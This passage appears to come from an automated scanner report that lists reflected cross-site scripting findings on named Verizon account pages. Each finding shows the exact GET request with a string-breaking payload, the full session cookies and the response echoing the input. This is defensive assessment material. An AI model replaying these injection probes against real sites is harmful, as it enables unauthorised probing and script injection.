Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:49:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66445525d5f4f58455e445a4a423660;path=/
Content-Length: 128975

<!-- Vignette V6 Fri Nov 19 18:49:44 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
Com=remopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/foryourhome/myaccount/Main/MyAccount.aspx?1dbeb";928f0315c8d=1';
<!-- Vignette V6 Fri Nov 19 18:49:44 2010 -->
...[SNIP]...

2.847. https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx [Target parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /foryourhome/registration/regprofile/ergcon.aspx

Issue detail

The value of the Target request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a525"%3b6c5402aa620 was submitted in the Target parameter. This input was echoed as 6a525";6c5402aa620 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /foryourhome/registration/regprofile/ergcon.aspx?Target=6a525"%3b6c5402aa620 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:43:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDSCSBQTCB=DGDMJDFBHBIOMKNLOAIKOOMO; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66b45525d5f4f58455e445a4a423660;path=/
Content-Length: 128927

<!-- Vignette V6 Fri Nov 19 18:43:11 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx?Target=6a525";6c5402aa620';
<!-- Vignette V6 Fri Nov 19 18:43:11 2010 -->
...[SNIP]...

2.848. https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /foryourhome/registration/regprofile/ergcon.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcc6f"%3b98476cbd401 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fcc6f";98476cbd401 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /foryourhome/registration/regprofile/ergcon.aspx?fcc6f"%3b98476cbd401=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:41:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDSCSBQTCB=KKCMJDFBHONCKMJLKPLHPKFD; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66b45525d5f4f58455e445a4a423660;path=/
Content-Length: 128993

<!-- Vignette V6 Fri Nov 19 18:41:52 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
mopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx?fcc6f";98476cbd401=1';
<!-- Vignette V6 Fri Nov 19 18:41:52 2010 -->
...[SNIP]...

2.849. https://www22.verizon.com/myverizon/ [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /myverizon/

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5019"%3b15d2ffcfe11 was submitted in the goto parameter. This input was echoed as c5019";15d2ffcfe11 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myverizon/?session=n&goto=https://www22.verizon.com:443/ForYourHome/MyAccount/Protected/Services/MyServices.aspxc5019"%3b15d2ffcfe11 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; lob=webmail; amlbcookie=03

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:15:44 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDCSBCCATB=PJJGEODCPLFPKBGNAFICECAB; path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:20:44 GMT; path=/myverizon/; domain=verizon.com
Content-Length: 129009

<!-- Vignette V6 Fri Nov 19 18:15:43 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
id="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspxc5019";15d2ffcfe11';
<!-- Vignette V6 Fri Nov 19 18:15:44 2010 -->
...[SNIP]...

2.850. https://www22.verizon.com/myverizon/ [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /myverizon/

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 383dc"%3bf834175335c was submitted in the goto parameter. This input was echoed as 383dc";f834175335c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myverizon/?goto=https://www22.verizon.com:443/ForYourHome/MyAccount/Protected/Services/MyServices.aspx383dc"%3bf834175335c HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-sf=false; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; lob=webmail; amlbcookie=03; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:15:10 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 129009

